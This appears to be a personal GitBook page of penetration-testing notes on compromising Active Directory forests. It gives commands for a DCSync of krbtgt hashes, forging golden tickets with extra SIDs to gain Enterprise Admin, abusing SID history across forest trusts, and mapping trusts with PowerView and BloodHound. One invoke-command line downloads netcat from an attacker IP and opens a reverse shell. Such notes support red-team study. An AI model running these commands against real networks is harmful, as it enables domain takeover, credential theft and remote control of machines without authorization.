All Gitbook

Forest

Multi-domain AD; Parent-child trust is transitive (multiple link of bi-directional trust). Enterprise Admins = Domain Admins in every domain in the forest, only exists in the root domain.

In the context of an Active Directory forest, our ultimate goal is to escalate our privileges from domain admin of one domain to Enterprise admin. The most direct way to obtain this is to compromise the root domain and obtain Enterprise Admin group membership.

Compromise forest pre-requisite at least to be a Domain Admin / DC Local Account to do dcsync by creating golden ticket via krbtgt hash.

DA to Enterprise Admin
#obtain current compromised child domain krbtgt hash
lsadump::dcsync /domain:prod.corp1.com /user:prod\krbtgt

#query current domain SID and parent/root domain SID
Get-DomainSID -Domain prod.corp1.com
Get-DomainSid -Domain corp1.com

#domain = current domain
#sid = current domain sid
#krbtgt = current domain krbtgt hash NTLM
#sids = root domain sid + "-519" (enterprise admin)
kerberos::golden /user:h4x /domain:prod.corp1.com /sid:S-1-5-21-3776646582-2086779273-4091361643 /krbtgt:4b6af2bf64714682eeef64f516a08949 /sids:S-1-5-21-1095350385-1831131555-2412080359-519 /ptt
#golden ticket injected, pretending to be the enterprise admin
#golden ticket will get rewritten by the domain controller in the current domain with the trust key before going to the parent domain so the parent domain perceives us as a legit enterprise admin
dir \\rdc02.comply.com\admin$
psexec \\dc01 cmd

invoke-command -computername rdc02.comply.com -scriptblock {iwr -uri http://192.168.X.Y/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.X.Y 443 -e cmd.exe}

No real security boundary exists between domains inside an Active Directory forest, but between multiple forests.

If without DA, and unconstrained delegation exists, it can be used to compromise root AD with printer bug.

compromise other forest
#pre-requsite: SID History enabled 
netdom trust targeted_corp2.com /d:corp1.com_compromised /enablesidhistory:yes

#sourceName: target ; TargetName: current compormised domain
Get-DomainTrust -Domain corp2.com
#TrustAttributes : *TREAT_AS_EXTERNAL*,FOREST_TRANSITIVE

#enum for custom forest domain local security group in the target with RID >1000 (sid尾數) (not global security group like DA / EA)
Get-DomainGroupMember -Identity "Administrators" -Domain corp2.com
#GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=corp2,DC=com
#MemberSID               : S-1-5-21-4182647938-3943167060-1815963754-1106

lsadump::dcsync /domain:corp1.com /user:corp1\krbtgt
Get-DomainSID -domain corp1.com
Get-DomainSID -domain corp2.com

#generate golden ticket with the >1000 sid local domain admin group
kerberos::golden /user:h4x /domain:corp1.com /sid:S-1-5-21-1095350385-1831131555-2412080359 /krbtgt:22722f2e5074c2f03938f6ba2de5ae5c /sids:S-1-5-21-4182647938-3943167060-1815963754-1106 /ptt
#Extra SIDs: S-1-5-21-4182647938-3943167060-1815963754-1106 ;

Can leverage trusted cross domain/forest SQL Server links.

A forest is only as strong as its least secure domain and even the security boundary imposed by forest trust can be broken in some instances.

Enumeration

Domain Trusts

@any domain joined client
nltest /trusted_domains
List of domain trusts:
    0: CORP1 corp1.com (NT 5)   ( Attr: withinforest )
    1: PROD prod.corp1.com (NT 5) (Forest: 0)  (Native)
The command completed successfully
alternatives
#.net method
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

SourceName     TargetName   TrustType TrustDirection
----------     ----------   --------- --------------
prod.corp1.com corp1.com  ParentChild  Bidirectional

#powerview win32 api (.net if -NET flag)
Get-DomainTrust -API

SourceName        : PROD.CORP1.COM
TargetName        : corp1.com
TargetNetbiosName : CORP1
Flags             : IN_FOREST, DIRECT_OUTBOUND, TREE_ROOT, DIRECT_INBOUND

#if corp1.com not root, continue enum
Get-DomainTrust -Domain corp1.com 

#LDAP query to Trusted Domain Object (TDO) that created from domain trusts
Get-DomainTrust
#similar to .net method output
Get-ForestDomain
Invoke-MapDomainTrust | select SourceName,TargetName, ustDirection
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain treesss.corp.com
Invoke-BloodHound –CollectionMethod Trusts –SearchForest

Users, Groups, Services in trusted domains

Get-DomainUser -Domain corp1.com
Get-DomainGroup -Domain corp1.com
Get-DomainGroupMember "Enterprise Admins"

a user in prod.corp1.com may be a member of a group in corp2.com.

# enumerate groups in a trusted forest or domain that contains non-native members
Get-DomainForeignGroupMember -Domain corp2.com

convertfrom-sid {memberName SID}
#reveals that the x user from our current domain is a member of myGroup2 in corp2.com.

Depending on the access rights associated with myGroup2, if we were to compromise the x user in our current domain, we could easily gain access to corp2.com.

Forest Trusts

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

TopLevelNames            : {corp2.com}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {corp2.com}
SourceName               : corp1.com
TargetName               : corp2.com
TrustType                : Forest
TrustDirection           : Bidirectional
alternative
#powerview
Get-DomainTrust -Domain corp1.com

SourceName      : corp1.com
TargetName      : prod.corp1.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 4/2/2020 2:08:22 PM
WhenChanged     : 4/2/2020 2:08:22 PM

SourceName      : corp1.com
TargetName      : corp2.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 4/2/2020 7:05:54 PM
WhenChanged     : 4/17/2020 9:53:21 PM

#automate enum all trusts
Get-DomainTrustMapping

We could also use the BloodHound and SharpHound ingestors to perform full trust mapping.

Search for users with the same username in both forests as they might belong to the same employee. If such an account exists, there is a chance that the accounts share a password.

PreviousBloodhoundNextJust Enough Administration (JEA)

Last updated